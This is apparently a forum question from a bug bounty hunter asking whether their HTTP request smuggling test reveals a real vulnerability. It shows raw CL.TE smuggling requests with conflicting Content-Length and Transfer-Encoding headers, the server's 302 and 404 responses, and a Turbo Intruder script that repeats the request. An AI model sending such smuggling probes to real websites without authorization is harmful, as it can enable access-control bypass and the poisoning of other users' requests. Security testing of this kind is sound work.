# http smuglling how can i do a poc in a big websites?

Tags: http, http-proxy, request-smuggling

i try to find http smuggling in big bug bouny program

if i send this to the server

```
POST /path HTTP/1.1
Host: subdomain.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: Keep-Alive
Content-Length: 6
Transfer-Encoding: chunked

0

j
```

i get

```
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Length: 0
Date: Fri, 12 Mar 2021 21:29:47 GMT
Location: http://somewhere.com
Via: 1.1 somewhere
Alt-Svc: clear
```

in the response

and if i send to server this:

```
ePOST /path HTTP/1.1
Host: subdomain.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: Keep-Alive
Content-Length: 5
Transfer-Encoding: chunked

0
```

i get in return:

```
HTTP/1.1 404 Not Found
Content-Length: 19
Content-Type: text/plain; charset=utf-8
Date: Fri, 12 Mar 2021 21:33:42 GMT
X-Content-Type-Options: nosniff
Via: 1.1 somewhere
Alt-Svc: clear

404 page not found
```

now i try to look for a cl.te attack so i send the first requerst

```
POST /path HTTP/1.1
Host: subdomain.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0%s
Connection: Keep-Alive
Content-Length: 5
Transfer-Encoding: chunked

0

e
```

to turbo intruder, with this script:

```
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=3,
                           pipeline=False
                           )

    for word in range(1000):
        engine.queue(target.req, "")


def handleResponse(req, interesting):
    table.add(req)
```

and i get `302` 1 time and `404` 49 time over and over again.

so when i see this it looks like this website has http smuggling but

when i try to use it to go to an Unauthorized place i get 401 like always

and when i send a lot of request i never even once got a bad request on a regular request

can someone tell me if thar is a http smuggling? and if not why does it look like i have?